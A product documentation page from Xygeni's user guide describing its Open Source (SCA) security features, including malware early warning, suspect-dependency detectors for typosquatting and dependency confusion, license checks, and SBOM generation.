Xygeni User Guides
  • Welcome to Xygeni
  • Getting Started
    • Create a Free Trial Account
    • Quick start with your code repository
    • Quick start with Xygeni CLI
    • Quick start with a preloaded project
    • Log in to Xygeni
    • Subscribe to Xygeni
  • Introduction to Xygeni
    • Key Concepts
      • Projects in Xygeni
      • Project Baseline
      • Detected Issues
      • Remediation Actions
      • Policies
      • Risk Level
      • SDLC Inventory
      • Standards Compliance
      • GuardRails
    • Xygeni Products
    • How Xygeni works
    • Xygeni Web UI Overview
      • Projects Screen
        • Risk Level
    • Integrating Xygeni into your Workflow
    • Prioritization Funnels
      • Custom Funnels
      • Prioritization Criteria (Stages)
        • Reachability
        • Exploitability
        • Fixable
    • Guardrails
    • Generate a SBOM
    • Reports
      • Trends
      • Scan History
    • Supported Integrations
    • Customizations
  • Xygeni Products
    • Application Security Posture Management (ASPM)
      • ASPM User Interface Guide
      • All Risks
        • Statistics
        • Issues Evolution
        • Issue Comparison Between Different Scans
      • Governance
      • Inventory
        • All Assets
        • Repositories
        • Components
        • CI/CD Assets
        • Delivery Assets
        • Systems & Tools
        • Collaborators
      • Health Check
      • Inventory Scanner
        • Inventory Scanner Configuration
        • Inventory Collaborators Scan
      • Importing reports from 3rd party tools
        • External Scanners Supported
          • Report upload for Kiuwan
            • ExportRule (.java)
    • Code Security (SAST)
      • Code Security (SAST) User Interface Guide
        • Risks (SAST)
        • Malicious Code
      • Malware Scanner
        • Malware Scanner Configuration
        • Malware Detectors
      • SAST Scanner
        • SAST Scanner Configuration
    • Open Source (SCA)
      • Open Source (SCA) User Interface Guide
      • Open Source Components
      • Supported Package Managers for dependency resolution
      • Risks (SCA)
      • OSS Prioritization Funnels
      • OSS Auto-Remediation
      • Malware Early Warning (MEW)
        • How Malware Early Warning works
        • Common types of Malware found in open source packages
      • Dependency Scanner
        • Dependency scanner configuration
        • Dependency Analyzers
      • Suspect Dependencies Scanner
        • Suspect Deps Scanner Configuration
        • Suspect Deps Detectors
    • CI/CD Security
      • CI/CD Security User Interface Guide
      • CI/CD Details
      • Build Attestations
      • CI/CD Scanner
        • CI/CD Misconfigurations Scanner Configuration
      • Compliance Scanner
        • Supported compliance standards
    • Secrets Security
      • Secrets User Interface Guide
      • Secrets Scanner
        • Secrets scanner configuration
      • Secret Leaks Handling
        • Secret Leaks Handling
        • How to Prevent Hard-Coded Secrets
        • Secret Leaks Handling CheatSheet
      • Secrets Auto-Remediation
    • IaC Security
      • IaC User Interface Guide
      • IaC Scanner
        • IaC Scanner Configuration
    • Malware
    • Build Security
      • Build Security Concepts
      • Build Attestations
      • Attestation format
      • How SALT works
      • Installing Salt CLI
      • Salt Command-Line Reference
      • SALT Architecture
      • SALT How To…​
    • Anomalous Activity Detection
      • Anomalous Activity Detection User Interface Guide
      • Xygeni Sensors
        • Xygeni Sensor for Azure
        • Xygeni Sensor for BitBucket
        • Xygeni Sensor for GitHub
          • GitHub Audit Log Processing
        • Xygeni Sensor for GitLab
        • Xygeni Sensor for Jenkins
        • Anomaly Detection's Detectors
      • Code Tampering Scanner
        • Code Tampering Scanner Configuration
    • Compliance & Malware Insights
      • SSCS Compliance
      • Malicious Packages DB
  • Scan Management
    • Manage Scans
    • Scan History
  • Xygeni Scanner CLI
    • Xygeni Scanners
    • Xygeni CLI Overview
      • Xygeni CLI Prerequisites
      • Xygeni CLI Installation
      • Xygeni CLI Docker Image
      • Xygeni CLI Authentication
        • CLI Authentication with Xygeni
      • SCM, CI/ CD and Container Registry tokens
      • Xygeni CLI Operation Modes
        • Single scan
          • Scanning a docker image
        • Multi Scan
        • Organization scan
      • Xygeni CLI Configuration options
      • Xygeni CLI Output Formats
      • Exporting Xygeni results to 3rd party tools
      • Automatic Remediation
      • Generate SBOM with the Xygeni CLI
      • CLI utils
        • Credentials Encryption
        • Central Configuration
      • Xygeni Guardrails
        • CI/CD Audit Analysis
      • Xygeni CLI Error Codes
      • Xygeni Scanner Reference
  • Xygeni Administration
    • Platform Administration
      • Profile
      • Subscription
      • Users Management
      • Projects Management
      • Groups Management
      • Policies
      • Integrations
        • Xygeni Single Sign-On (SSO) Authentication
          • SSO - OKTA
          • SSO - Microsoft Entra ID
        • Integrate Scanner CLI into CI/CD Systems
          • Azure Pipelines Integration
          • BitBucket Integration
          • CircleCI Integration
          • GitHub Actions Integration
          • GitLab Runner Integration
          • Jenkins Integration
          • Travis CI Integration
        • Git Hooks with Xygeni
        • Collaboration & communication Tools
        • Ticketing Systems
        • Remediation systems
      • Notifications
    • Rest API
  • Support
  • Changelog
    • Version 5.11 - April 11, 2025
    • Version 5.9 – March 26, 2025
Powered by GitBook
On this page
  • OSS Overview
  • Comprehensive Component Identification
  • Strategic Approach for Risk Prioritization with ASPM
  • Malware Early Detection, Blocking, and Notification
  • Simplify Open Source Licensing
  • Keep Your Software Updated and Secure
  • Advanced Detection of Suspect Dependencies
  • Optimized and Accelerated Remediation Workflows
  • Enhance Transparency and Compliance with SBOM and VDR Generation
  • Effective Vulnerability Management
  • Overview of Supported Package Managers
  • Types of Suspect Dependency Detector
  • SBOM and VDR capabilities
  • Analyzers
Export as PDF
  1. Xygeni Products

Open Source (SCA)

PreviousSAST Scanner ConfigurationNextOpen Source (SCA) User Interface Guide

Last updated 23 days ago

OSS Overview

Open Source Security offers real-time monitoring of your dependencies to detect and mitigate threats before they impact your software.

Recent reports reveal that nearly three-quarters of codebases now contain high-risk open-source components. Vulnerabilities have soared from 48% to 74% in just one year. Even more concerning, 91% of these components are at least 10 versions outdated, significantly heightening security risks. The rise of malicious open-source packages has been meteoric, with growth rates exceeding 300% year-over-year, resulting in over 245K malicious packages detected in 2023. It’s time to take action against these threats.

Given these challenges, Xygeni’s Open Source Security solution is essential. It scans and blocks harmful packages upon publication, dramatically reducing the risk of malware and vulnerabilities infiltrating your systems. This comprehensive monitoring spans multiple public registries, ensuring all dependencies are scrutinized for safety and integrity. Xygeni also enhances your team’s ability to maintain secure and reliable software projects by contextually prioritizing critical issues and facilitating streamlined remediation processes

Xygeni Open Source Security is designed to provide complete protection against vulnerabilities and malicious code, ensuring your applications remain secure and resilient. With a robust suite of capabilities, Xygeni offers unparalleled visibility and control over your open-source components, helping you to manage risks effectively.

  1. Comprehensive Component Identification and cataloging of each open-source component within your software projects.

  2. Continuous Scanning and Vulnerability Management to ensure that every component, whether direct, indirect, or undeclared, is assessed for security vulnerabilities, maintenance issues, and licensing compliance.

  3. Context-aware prioritization based on their severity, exploitability, and potential business impact. This context-aware approach ensures that your security and development teams focus on the most critical issues.

  4. Expanded Security Beyond CVEs by incorporating additional risk factors beyond just CVSS scores. Xygeni prevents the integration of packages that may be CVE-free but still risky.

  5. License Risk Management with instant visibility into potential open-source license issues, helping your team avoid legal complications and ensure regulatory compliance.

  6. The one-click generation of SBOM and VDR in SPDX or CycloneDX formats ensures that your software components are transparent and compliant with regulatory requirements.

Comprehensive Component Identification

At the heart of Xygeni’s Open Source Security is our advanced capability to precisely identify and catalog every open-source component in your software projects. This thorough approach provides complete visibility into your software’s architecture, enabling a detailed assessment of your project’s security posture and compliance status. Your team can make better decisions by understanding exactly what makes up your software.

Strategic Approach for Risk Prioritization with ASPM

Xygeni’s software security platform excels in identifying and prioritizing vulnerabilities that pose the most significant risks to your software projects. By systematically analyzing the severity and potential impact of each identified vulnerability, Xygeni enables organizations to focus their resources on mitigating the most critical issues first. Our prioritization is driven by a combination of factors such as vulnerability severity, exploitability, exposure, the potential impact on business operations, and any other custom property defined by customers. Some key features of Xygeni’s prioritization process are:

  1. Continuous Scanning: Xygeni assesses each vulnerability based on its severity and the affected component’s context. This approach ensures that vulnerabilities are not just evaluated in isolation but are considered within the broader scope of the system’s architecture.

  2. Context-Aware Prioritization: Understanding that not all vulnerabilities are created equal, Xygeni prioritizes issues based on their operational and strategic impact. This means vulnerabilities that could lead to significant security breaches are flagged and addressed first.

  3. Customizable Risk Metrics: Xygeni allows organizations to customize how risks are scored and prioritized, aligning the prioritization process with their specific security policies and compliance requirements. This customization capability ensures that the security efforts perfectly sync with organizational priorities and risk

Malware Early Detection, Blocking, and Notification

As soon as new packages are published, Xygeni conducts a real-time scan to detect and block malware based on code behavior analysis, alleviating the need for extensive and urgent post-build remediation. Our systematic process sounds like this:

Continuous Scanning:

  • Public Registries Monitored: The service continuously scans multiple public registries like NPM, Maven, PyPI, etc.

  • Immediate Notification to Affected Users: As soon as a potential threat is detected, the system immediately notifies the affected users, enabling rapid response to mitigate risks. Notifications can be raised through standard Xygeni mechanisms such as email, messaging platforms, and webhooks.

Quarantine:

  • Automatic Blocking of Zero-Day Malware: Upon detection, suspicious packages are automatically quarantined. The customer can use this information to implement guardrails in their CI/CD to prevent the packages from entering the development environment or the broader software supply chain.

Review and Confirmation:

  • Code Review by Security Researchers: A security research team reviews the quarantined package to verify the threat.

  • Confirmation by Public Registry: If confirmed by our internal team, we communicate it to the public registry, which should confirm the finding and validate the threat level and the nature of the malware or vulnerability.

Disposal and Public Disclosure:

  • Disposal: Once a threat is confirmed, the appropriate measures are taken to dispose of the threat safely, ensuring it does not re-enter the ecosystem.

  • Public Disclosure: The usual details about the malware and its disposal are publicly disclosed through the product, Xygeni blog, or the package registry to inform the wider community and prevent

Simplify Open Source Licensing

Xygeni makes navigating the complexities of open-source licensing easy. Our scanning capabilities assess each component’s license, helping your team avoid legal issues and ensure compliance with both organizational policies and external regulations. With Xygeni, you can confidently use open-source software, knowing that all licensing requirements are met.

Keep Your Software Updated and Secure

Xygeni actively monitors and identifies outdated or obsolete components in your software projects. By ensuring your projects always utilize the latest and most secure versions, Xygeni not only reduces potential security risks but also boosts software performance and compatibility.

Advanced Detection of Suspect Dependencies

Xygeni’s Suspect Dependencies Scanner is crucial for identifying and managing suspect dependencies that could be targets for supply-chain attacks. By analyzing the dependency graph, our product can detect issues such as typo-squatting, dependency confusion, and suspicious installation scripts that may indicate a compromise. If a component is recognized as suspicious, Xygeni provides detailed mitigation and remediation strategies to help safely remove or isolate the threat. This includes recommendations for version pinning, using whitelisted components, and blocking suspicious installation scripts.

Optimized and Accelerated Remediation Workflows

Prioritizing vulnerabilities that pose the highest risk ensures that remediation efforts are concentrated where they are most needed, optimizing resource allocation and reducing the time and effort spent on lower-risk vulnerabilities. Moreover, Xygeni simplifies the remediation of open-source vulnerabilities by integrating directly into developers’ existing workflows and issue-tracking systems. This seamless integration provides all the necessary context for each vulnerability right within the tools developers already use, facilitating efficient and effective remediation.

Enhance Transparency and Compliance with SBOM and VDR Generation

Xygeni Open Source Security empowers organizations to maintain complete transparency over their software components with our SBOM generation feature. SBOM facilitates compliance with regulatory requirements and enhances supply chain security by providing a detailed inventory of all software dependencies. Additionally, our Vulnerability Disclosure Report (VDR) generation capability ensures that all stakeholders know potential vulnerabilities, enabling proactive risk management and reinforcing trust throughout the development lifecycle.

Effective Vulnerability Management

Xygeni enhances your software’s security by continuously scanning and analyzing open-source components for vulnerabilities. By connecting directly with the National Vulnerability Database (NVD), other vertical vulnerabilities databases and security advisories, and using Common Vulnerabilities and Exposures (CVE) information, Xygeni ensures fast and accurate detection of potential security issues to protect your software applications promptly and efficiently.

Overview of Supported Package Managers

Xygeni provides a comprehensive range of detectors tailored to the unique characteristics of various software package managers, ensuring comprehensive coverage and precise detection of dependencies.

Types of Suspect Dependency Detector

  • Anomalous Dependencies: Identifies unusual or unexpected dependencies within the context of the project, which may signal a security concern.

  • Dependency Confusion: This feature detects cases where internal package names may be confused with similarly named packages from public repositories, potentially leading to security breaches.

  • Known Vulnerabilities: Flags dependencies that contain recognized security vulnerabilities.

  • Malware: Looks for dependencies known to contain malware, providing critical security alerts to prevent potential harm.

  • Suspicious Scripts: Monitors for scripts within dependencies that might perform unauthorized or harmful actions.

  • Typosquatting: Aims to catch potentially malicious typosquatting attempts where package names are slightly altered to trick users into installing them.

  • Unscoped Internal Components: This is a special detector for NPM that identifies unscoped internal components and thus might be at risk of being publicly exposed or confused with external packages

To accomplish these functionalities, Xygeni provides a Scanner (to search for dependencies and security issues) and a Web UI to view the results.

SBOM and VDR capabilities

In response to growing cybersecurity threats, regulatory bodies worldwide are increasingly mandating using Software Bill of Materials (SBOMs). SBOMs provide essential visibility into the components of software applications, facilitating better vulnerability management and compliance with security standards.

Analyzers

Dependencies for each ecosystem are processed by a specific analyzer. The analyzer processes dependency descriptors to extract direct and indirect dependencies, resolve their versions, and gather context information like licensing, provenance and other metadata.

Please visit for a full description of supported package managers.

Open Source Security provides a comprehensive range of detectors tailored to the unique characteristics of various software ecosystems, ensuring comprehensive coverage and precise detection of suspect dependencies, among others : maven, PyPi, NPM, nugget, etc. See for a complete list.

See and, more specifically, and for instructions on how to execute an Open Source scan.

See and, more specifically, and for instructions on how to execute an Open Source scan.

See and

Supported Package Managers for Dependency Resolution Analyzers
Open Source Analyzers
Scan with Xygeni CLI
Dependency Scanner
Suspect Dependencies Scanner
Scan with Xygeni CLI
Dependency Scanner
Suspect Dependencies Scanner
Malware Detection
Malware Early Warning Service